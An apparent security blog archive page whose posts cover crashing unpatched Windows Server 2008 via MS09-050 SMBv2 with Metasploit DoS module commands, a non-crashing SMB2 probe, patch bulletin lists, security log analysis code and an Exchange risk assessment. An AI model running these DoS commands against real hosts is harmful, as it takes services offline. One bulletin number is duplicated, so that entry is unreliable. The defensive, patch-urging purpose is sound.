
Hacking Virtual Machines Part 3 - Crashing unpatched Hyper-V hosts

Virtualization is considered the new renaissance in computing. Suddenly, all those oversized servers are put to good use by running multiple guest OSes on them. But running IT services in a virtualized environment also brings a whole host of new opportunities for attackers.

In this article, we'll review the issue of Denial of Service against a virtualization environment.

One of the most important elements of a virtualization environment is isolation. The host OS and the guest OS machines run on the same hardware, and none of them should be able to access the resources of another, including memory, CPU time, video memory and so on.


Many virtualization implementations have had flaws in their isolation, and such flaws allow an attacker to mount several different types of successful attack.

The simplest one is a Denial of Service attack. A compromised guest generates traffic or memory accesses aimed at address space outside its own, attempting to breach the isolation wall and corrupt another guest OS or the host OS. It is quite common for early versions of a virtualization platform to have vulnerabilities in the isolation mechanisms.

The following is an example of a breach of the isolation wall on an unpatched Windows Server 2008 Hyper-V host.

Please note that this attack only works on a default installation of Windows Server 2008 with no patches applied.
So all your virtualization platforms should be fully patched.






Talkback and comments are most welcome

Related posts
Hacking Virtual Machines Part 1 - Sniffing
Hacking Virtual Machines Part 2 - Environments Where Virtualization Lives

Microsoft Patch Disclosure - November 2010

Microsoft has released three bulletins which fix a total of 11 vulnerabilities.

  • 2 bulletins address Remote Code Execution vulnerabilities
  • 1 bulletin addresses Elevation of Privilege vulnerabilities.

Critical
MS10-087 - Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)
MS10-088 - Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2293386)

Important

MS10-089 - Vulnerabilities in Forefront Unified Access Gateway (UAG) Could Allow Elevation of Privilege (2316074)

Attacking an unpatched Windows 2008 Server

Microsoft cannot stress enough the importance of keeping your systems patched. And yet, server systems tend to drift from best practice, for several reasons:

  • The patch may break the application that the server is running
  • The patch will require a reboot, which may cause unwanted downtime
  • It's simply a hassle
But unpatched systems are a great target for an attacker. Even if the attacker doesn't gain permanent access to the network, he or she can cause a nasty Denial of Service (DoS) on an unpatched server.
Here is the attack scenario.
We will use a Windows Server 2008 target for this demonstration. Win2008 is a good example because even though it was released in 2008, and we now have the R2 version, a lot of companies are only just starting to deploy it.

The attack is based on two well-known vulnerabilities in the SMBv2 driver (SRV2.SYS) of Win2008, which Microsoft fixed in October 2009 with bulletin MS09-050. In Metasploit, the corresponding modules are:

  • auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
  • auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
Both are Denial of Service modules, so there is no payload to choose: a successful run crashes the target instead of giving you a shell.

To use these modules, just fire up msfconsole and type (the modules live under auxiliary/, so there is no "exploit" prefix in the path):

msf > use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > set RHOST (Target IP address)
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > run


You can do the same with the second exploit.
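Before pointing a DoS module at anything, a practitioner usually wants a harmless pre-check: does the host actually expose SMB2 on port 445? The following Python 3 script is an added example written for this page; it is not part of the original post and not Metasploit code. It sends a normal SMBv1 Negotiate request that offers the "SMB 2.002" dialect, which is the same opening step the negotiate_pidhigh module performs, and reports whether the host answers with an SMB2 header. The PIDHigh header field, the one the MS09-050 negotiate module abuses, is deliberately left at zero, so the probe cannot crash the target. The host name is an assumption taken from the command line, and the SMB2 response bytes used for offline testing are constructed, not captured from a real server.

```python
import socket
import struct

# Dialects offered in the SMBv1 Negotiate request. Offering "SMB 2.002" is what
# makes a Windows Server 2008 host answer with an SMB2 header instead of SMB1.
DIALECTS = (b"NT LM 0.12", b"SMB 2.002")
SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64


def netbios_wrap(smb_message):
    """Prefix an SMB message with the 4-byte NetBIOS session service header."""
    return b"\x00" + struct.pack(">I", len(smb_message))[1:] + smb_message


def build_smb1_negotiate(pid_high=0):
    """Build an SMB_COM_NEGOTIATE request (MS-CIFS header layout).

    pid_high is the 16-bit PIDHigh header field. A well-formed client sends 0;
    the MS09-050 negotiate_pidhigh module abuses this field, so the probe keeps
    it at 0 and only asks which dialect the server is willing to speak.
    """
    dialects = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    header = (
        SMB1_MAGIC
        + b"\x72"                                # SMB_COM_NEGOTIATE
        + struct.pack("<I", 0)                   # NT status
        + b"\x18"                                # Flags: canonical paths, case-insensitive
        + struct.pack("<H", 0xC853)              # Flags2: unicode, NT status, ext. security
        + struct.pack("<H", pid_high)            # PIDHigh
        + b"\x00" * 8                            # SecurityFeatures (signature)
        + struct.pack("<H", 0)                   # Reserved
        + struct.pack("<HHHH", 0, 0x1234, 0, 1)  # TID, PIDLow (arbitrary), UID, MID
    )
    body = b"\x00" + struct.pack("<H", len(dialects)) + dialects  # WordCount, ByteCount
    return netbios_wrap(header + body)


def classify_negotiate_response(data):
    """Return ("smb2", dialect), ("smb1", None) or ("unknown", None) for a raw reply."""
    msg = data[4:]  # drop the NetBIOS session header
    if msg.startswith(SMB2_MAGIC):
        # SMB2 NEGOTIATE response body: StructureSize(2) SecurityMode(2) DialectRevision(2) ...
        if len(msg) < SMB2_HEADER_LEN + 6:
            return ("smb2", None)
        dialect = struct.unpack_from("<H", msg, SMB2_HEADER_LEN + 4)[0]
        return ("smb2", dialect)
    if msg.startswith(SMB1_MAGIC):
        return ("smb1", None)
    return ("unknown", None)


def sample_smb2_negotiate_response(dialect=0x0202):
    """Constructed (not captured) minimal SMB2 NEGOTIATE response for offline testing."""
    header = (
        SMB2_MAGIC
        + struct.pack("<HHIHHIIQIIQ",
                      64,   # StructureSize
                      0,    # CreditCharge
                      0,    # Status
                      0,    # Command: NEGOTIATE
                      1,    # CreditResponse
                      1,    # Flags: SERVER_TO_REDIR
                      0,    # NextCommand
                      0,    # MessageId
                      0,    # Reserved
                      0,    # TreeId
                      0)    # SessionId
        + b"\x00" * 16      # Signature
    )
    body = (
        struct.pack("<HHHH", 65, 1, dialect, 0)  # StructureSize, SecurityMode, DialectRevision, Reserved
        + b"\x00" * 16                            # ServerGuid
        + struct.pack("<IIIIQQHHI", 0, 65536, 65536, 65536, 0, 0, 128, 0, 0)
    )
    return netbios_wrap(header + body)


def probe_smb2(host, port=445, timeout=5.0):
    """Send the Negotiate request to a live host and classify the reply (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_smb1_negotiate())
        reply = s.recv(4096)
    return classify_negotiate_response(reply)


def describe(result):
    kind, dialect = result
    if kind == "smb2":
        if dialect == 0x0202:
            return "SMB 2.002 enabled (the SMB2 dialect Windows Server 2008 offers); confirm MS09-050 / KB975517 is installed"
        return "SMB2 enabled, dialect 0x%04x" % (dialect or 0)
    if kind == "smb1":
        return "only SMB1 negotiated; SMB2 appears to be disabled"
    return "no SMB negotiate response"


if __name__ == "__main__":
    import sys
    print(describe(probe_smb2(sys.argv[1])))  # usage: python smb2_probe.py <target>
```

Run it as `python smb2_probe.py 10.0.0.5` (hypothetical address). An SMB2 answer only tells you that the host is exposed to this class of attack, not that the patch is missing: the reliable check is whether KB975517 (the update shipped with MS09-050) shows up in the installed updates. If the patch cannot be applied immediately, the Microsoft-documented workaround for MS09-050 was to disable SMBv2 on the server (the Smb2 DWORD under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters set to 0, then restart the Server service); after that change the probe above should report only SMB1.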

Here is the end result from a Metasploit command line point of view.


And here is the end result from a Windows 2008 Console point of view


Conclusion
Although this is just a demonstration, it is an excellent example of what happens to an unpatched server. Imagine that this was the web server running your web site. Now go and patch your systems :)

Talkback and comments are most welcome

Microsoft Patch Disclosure - October 2010

October 2010 brings a HUGE update set. Microsoft released 16 bulletins which fix a total of 51 vulnerabilities:

  • 10 bulletins address Remote Code Execution vulnerabilities
  • 3 bulletins address Elevation of Privilege vulnerabilities
  • 1 bulletin addresses an Information Disclosure vulnerability
  • 1 bulletin addresses a Denial of Service condition
  • 1 bulletin addresses a Tampering vulnerability

Critical
MS10-071 - Cumulative Security Update for Internet Explorer (2360131)
MS10-075 - Vulnerability in Media Player Network Sharing Service Could Allow Remote Code Execution (2281679)
MS10-076 - Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (982132)
MS10-077 - Vulnerability in .NET Framework Could Allow Remote Code Execution (2160841)

Important

MS10-072 - Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)
MS10-073 - Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957)
MS10-078 - Vulnerabilities in the OpenType Font (OTF) Format Driver Could Allow Elevation of Privilege (2279986)
MS10-079 - Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2293194)
MS10-080 - Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2293211)
MS10-081 - Vulnerability in Windows Common Control Library Could Allow Remote Code Execution (2296011)
MS10-082 - Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111)
MS10-083 - Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution (2405882)
MS10-084 - Vulnerability in Windows Local Procedure Call Could Cause Elevation of Privilege (2360937)
MS10-085 - Vulnerability in SChannel Could Allow Denial of Service (2207566)

Moderate

MS10-074 - Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution (2387149)
MS10-086 - Vulnerability in Windows Shared Cluster Disks Could Allow Tampering (2294255)

Microsoft Patch Disclosure - March 2010 Out-of-Band

March 2010 brings an out-of-band bulletin from Microsoft covering a total of ten vulnerabilities.

MS10-018 - Cumulative Security Update for Internet Explorer (980182)

The update covers nine privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

CVE-2010-0267 - Uninitialized Memory Corruption Vulnerability
CVE-2010-0488 - Post Encoding Information Disclosure Vulnerability
CVE-2010-0489 - Race Condition Memory Corruption Vulnerability
CVE-2010-0490 - Uninitialized Memory Corruption Vulnerability
CVE-2010-0491 - HTML Object Memory Corruption Vulnerability
CVE-2010-0492 - HTML Object Memory Corruption Vulnerability
CVE-2010-0494 - HTML Element Cross-Domain Vulnerability
CVE-2010-0805 - Memory Corruption Vulnerability
CVE-2010-0806 - Uninitialized Memory Corruption Vulnerability
CVE-2010-0807 - HTML Rendering Memory Corruption Vulnerability

Microsoft rates the severity as Critical.

Microsoft Patch Tuesday - March 2010

The March update brings two bulletins, with eight vulnerabilities covered.

MS10-017: Potential Remote Code Execution in
  • Windows Movie Maker
covering one vulnerability:
CVE-2010-0265 (Buffer Overflow in Movie Maker and Producer).

Microsoft rates it as Exploitability Index: 1; Deployment Priority: 2.


MS10-017: Potential Remote Code Execution in
  • Excel
  • Excel Viewer
  • Office for Mac
  • Office Compatibility Pack,
  • Excel Services
covering seven vulnerabilities:
CVE-2010-0257 (Record Memory Corruption)
CVE-2010-0258 (Sheet Object Type Confusion)
CVE-2010-0260 (MDXTUPLE Record Heap Overflow)
CVE-2010-0261 (MDXSET Record Heap Overflow)
CVE-2010-0262 (FNGROUPNAME Record Uninitialized Memory)
CVE-2010-0263 (XLSX File Parsing)
CVE-2010-0264 (DbOrParamQry Record Parsing).

Microsoft rates it as Exploitability Index: 1; Deployment Priority: 2.

Accelerating Security Assessment with MS Security Assessment Tool

When working on a security assessment, it is always helpful to use an automated tool that compares the key elements against known best practices and generates an overview result set.
Among other tools that can be used, Microsoft has released one titled Microsoft® Security Assessment Tool (MSAT).

The assessment performed by this tool strives to identify the business risk of the organization and the security measures deployed to mitigate that risk.
The assessment takes the form of a questionnaire, with Yes/No answers, that covers the following areas:

  • Infrastructure - Infrastructure security collects information on how the networks function, what business processes (internal or external) they support, how hosts are built and deployed, and how the networks are managed and maintained.
  • Applications - Application security reviews the applications within the organization and assesses them from a security and availability standpoint. It examines the technologies used within the environment and reviews the high-level procedures an organization can follow to help mitigate application risk.
  • Operations and People - This section reviews the processes within the enterprise governing corporate security policies, Human Resources processes, and employee security awareness and training. It also focuses on security as it relates to day-to-day operational assignments and role definitions.
The resulting comparison to best practices generates a summary report, as well as a much more useful detailed report of the areas which fall short of best practice. The report contains a lot of suggestions and links to related products and best practices published by Microsoft.


The MS Security Assessment Tool and its report are not a replacement for a full-blown analysis, nor can they be used as a one-stop shop for a realistic security analysis; the questionnaire records what you say you do, not what is actually configured. When performing a real analysis, an in-depth review of process and technology is needed.
MSAT is just a helpful tool to generate a security posture overview and some automated recommendations, so it is a nice start. For everything else, you will need to bring in expert professionals.


Talkback and comments are most welcome

Related posts
WMI Scanning - Excellent Security Tool
Risk Assessment with Microsoft Threat Assessment & Modeling
Google's Ratproxy Web Security Tool for Windows
Analysis of Windows Security Logs with MS Log Parser
How To - Malicious Web SIte Analysis Environment

Analysis of Windows Security Logs with MS Log Parser

When investigating an intrusion in a Windows system, one of the first places to start is the Windows Security log. The Security event log is also very useful when searching for anomalies and possible intrusions.

Reading through a Windows Security log, or any other log, can be very difficult and time consuming, so a lot of companies have created their own tools to analyze Windows event logs. But before you go commercial, there is a tool that will get you going at no cost. Against all odds, it's a tool made by Microsoft!

The tool
The tool in question is Microsoft Log Parser. Log Parser is a command-line tool that provides universal, SQL-like query access to text-based data such as log files, XML files and CSV files, as well as key data sources on the Windows operating system such as the Event Log, the Registry, the file system and Active Directory. So you can use it to analyze most structured text-based files, plus the event log and AD, on a single computer.

You can query remote computers on the network, as long as the credentials that Log Parser runs under can access the data sources on the remote computers.

To read the Security log, you need to run Log Parser as an administrator.
Note that this tool doesn't collect data from multiple computers; it just analyzes data in a single file or a single computer's repository.

The improved interface
In its original form, Log Parser is a command-line tool, so it is not the most user-friendly tool in the world. It also has no way of saving your prepared queries so you can invoke them later. But a developer named Dimce Kuzmanov created a free front end to Log Parser called Log Parser Lizard.


Log Parser Lizard enables you to store prepared queries and organizes them by the type of data source on which you wish to do an analysis. It can also export results to Excel, auto-generate charts from the result of an executed query, and export the queried subset back into the original format from which the analysis was performed.

Analyzing the Security Log with Log Parser Lizard
Using Log Parser Lizard for Security log analysis is very simple. Choose the Queries button and select the Event Logs category, then create the queries that you need for your analysis. Here are some examples:

  • SELECT * FROM SECURITY - simple dump of all data from the Security log
  • SELECT EVENTID, COUNT(*) FROM SECURITY GROUP BY EVENTID - find out which types of events appear in the Security log and in what quantity
  • SELECT * FROM SECURITY WHERE EVENTID = 517 - find whether the Security log was cleared on Windows 2000/XP/2003 (EventID is a numeric field; on Vista, Windows 2008 and later the equivalent event is 1102)
After you create the query, choose the appropriate category, then click the 'Generate' button to execute it. You can also graph the results by choosing the Chart->Visible option.
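The three queries above answer "what is in the log"; the next thing an investigator wants is "what in it looks bad". The Python 3 script below is an added example written for this page, not code from the original post, from Log Parser or from Log Parser Lizard. It works over a CSV export of the Security log in the shape Log Parser produces (Log Parser's default separator for the Strings insertion-string field is "|") and implements the same GROUP BY count as the second query, the log-cleared check of the third query for both the old and the new event IDs, and a sliding-window detection of failed-logon bursts per account. The sample rows are constructed, not a real export, and their Strings column is simplified to "user|domain" (in a real export the position of the account name differs between event 529 and event 4625).

```python
import csv
import io
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOG_CLEARED = {517, 1102}    # 517: Windows 2000/XP/2003, 1102: Vista/2008 and later
FAILED_LOGON = {529, 4625}   # 529: Windows 2000/XP/2003, 4625: Vista/2008 and later
TS_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample rows (not a real export). Columns mirror
# SELECT TimeGenerated, EventID, ComputerName, Strings FROM Security
# with the Strings field simplified to "user|domain".
SAMPLE_CSV = """TimeGenerated,EventID,ComputerName,Strings
2010-11-02 08:00:05,528,SRV01,alice|CORP
2010-11-02 08:01:10,529,SRV01,bob|CORP
2010-11-02 08:01:12,529,SRV01,bob|CORP
2010-11-02 08:01:15,529,SRV01,bob|CORP
2010-11-02 08:01:17,529,SRV01,bob|CORP
2010-11-02 08:01:20,529,SRV01,bob|CORP
2010-11-02 08:30:00,529,SRV01,carol|CORP
2010-11-02 09:15:00,517,SRV01,Administrator|CORP
2010-11-02 11:00:00,529,SRV01,carol|CORP
"""


def load_rows(text):
    """Parse the CSV export into dicts, sorted by time (the burst detector relies on order)."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "time": datetime.strptime(r["TimeGenerated"], TS_FMT),
            "event_id": int(r["EventID"]),
            "computer": r["ComputerName"],
            "account": r["Strings"].split("|")[0],
        })
    rows.sort(key=lambda r: r["time"])
    return rows


def events_by_id(rows):
    """Same result as SELECT EVENTID, COUNT(*) FROM SECURITY GROUP BY EVENTID."""
    return Counter(r["event_id"] for r in rows)


def log_cleared_events(rows):
    """Rows recording that the audit log was cleared (517 or 1102)."""
    return [r for r in rows if r["event_id"] in LOG_CLEARED]


def failed_logon_bursts(rows, threshold=5, window=timedelta(minutes=5)):
    """Accounts with at least `threshold` failed logons inside any `window`.

    Sliding window over each account's time-sorted failures. Returns
    {account: time at which the threshold was first reached}.
    """
    per_account = defaultdict(list)
    for r in rows:
        if r["event_id"] in FAILED_LOGON:
            per_account[r["account"]].append(r["time"])
    bursts = {}
    for account, times in per_account.items():
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1              # slide the window forward
            if end - start + 1 >= threshold:
                bursts[account] = t
                break
    return bursts


def report(rows):
    """Human-readable summary lines, handy when run from the command line."""
    lines = ["event counts: " + ", ".join(
        "%d x%d" % (eid, n) for eid, n in sorted(events_by_id(rows).items()))]
    for r in log_cleared_events(rows):
        lines.append("LOG CLEARED on %s at %s by %s" % (
            r["computer"], r["time"].strftime(TS_FMT), r["account"]))
    for account, when in sorted(failed_logon_bursts(rows).items()):
        lines.append("failed-logon burst for %s, threshold reached at %s" % (
            account, when.strftime(TS_FMT)))
    return lines


if __name__ == "__main__":
    for line in report(load_rows(SAMPLE_CSV)):
        print(line)
```

To run it on real data, export the log first, for example with `LogParser.exe -i:EVT -o:CSV "SELECT TimeGenerated, EventID, ComputerName, Strings FROM Security" > security.csv`, then feed the file's contents to `load_rows`. The 5-failures-in-5-minutes threshold is an assumption chosen for the constructed sample; tune it to the account-lockout policy of the domain you are investigating.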

Conclusion
Analyzing the Security log is always a useful check on your security controls, so you need to include it in your routine operations. And until you buy a SIEM system which will run automatic, scheduled analysis, you should adopt a simple tool like Log Parser and Log Parser Lizard.


Talkback and comments are most welcome

Related posts
Tutorial - Mail Header Analysis for Spoof Protection
Reminder Tutorial - Enable Auditing on Windows 7
Windows 7 Full Disk Encryption with Truecrypt

Example Risk Assessment of Exchange 2007 with MS TAM

In our previous post, we discussed the process of risk assessment assisted by Microsoft Threat Analysis and Modeling (MS TAM). While that post was purely theoretical, we are following up with a sample risk assessment of an IT service: an Exchange 2007 infrastructure.


The assessment is based on the prototype design of a Microsoft Exchange infrastructure, and every Exchange role is treated as a separate component/server. An Active Directory domain controller is added to the infrastructure since Exchange is integrated with it. We also added a Mailbox Database role, just as an example that the roles can be dissected to whatever depth is needed.

The elements
The analysis contains the following components. Add each of them to the appropriate container within MS TAM.
User roles

  • Exchange Admins - all administrators of the infrastructure
  • Exchange Users - users of all Exchange services
  • Exchange OWA Users - users of Outlook Web Access (webmail users)
  • External mail users - users of other mail servers on the internet
Components with Service Roles
  • Mailbox Server with Mailbox Server Service Role
  • Hub Transport Server with Hub Transport Service Role
  • Edge Transport Server with Edge Transport Service Role
  • Client Access Server with Client Access Service Role
  • Mailbox Database with Mailbox Database Service Role
  • AD Domain Controller with Domain Controller Service Role
External dependencies
  • External Mail Servers
Data
The data processed within this infrastructure is the following
  • E-mail message - the main target, the incoming and outgoing e-mail messages.
  • Exchange address - your e-mail address
  • Exchange Configuration - All Exchange Roles Configuration - Stored within Domain Controller
  • Login Credentials - username/password

Use cases

We have limited the use cases to the most basic and essential activities within this infrastructure. For each use case you will need to include the necessary calls to make it functional.
  • Receive External E-mail
  • Read E-mail Via POP3 /IMAP/OWA
  • Send E-mail To Exchange User
  • Exchange Admin Manages Exchange Accounts
  • Send E-mail to External Address
Also, the assessment has additional relevancies:
  • Component utilizes Power Supply - The component is susceptible to power failures
  • Component utilizes Communication Links - The component depends on functional LAN/WAN links to perform its function
  • Component utilizes Disk Capacity - The component stores data and relies on disk storage, so it can lose data if the disk fails or its capacity is filled
  • Component is a Physical Object - The component is a physical object and can be physically accessed, stolen or tampered with, or, ultimately, it can fail

The analysis
After setting up these elements, click Tools->Generate Threats. Choose "Generate Threats based on all of your calls" and use Intelligent Append.
The resulting set of risks can be confusing, since the entries are auto-generated and have generic names. You will need to read through them, and possibly merge two or more into one, since they can be addressing the same risk.

After you have finished the filtering, you need to define the Probability and Impact of each risk, and select the Risk Response as well as countermeasures from the offered set. This task is very time consuming and often difficult. You should always get the assistance of a subject matter expert who can give you valuable input.

When you have done this for every risk, you have finished the risk assessment.

The Report
As we pointed out in the previous post, the most useful report template for risk analysis does not exist among the predefined reports, but can be downloaded here.
The final risk analysis report for this infrastructure can be downloaded here.
You may also benefit from the Comprehensive Report, which is included in the templates of MS TAM.

Conclusion
We hope that this example will help you in the everyday use of MS TAM as a risk assessment tool.
We are also publishing the entire ACE Threat Model file of this example for download and use.
Please do not hesitate to contact Shortinfosec if you have any questions or issues.


Talkback and comments are most welcome

Related posts
Risk Assessment with Microsoft Threat Assessment & Modeling
Reduce Risks in Projects with 'Deal Breakers'
Tutorial - Secure Web Based Job Application
Information Risks when Branching Software Versions
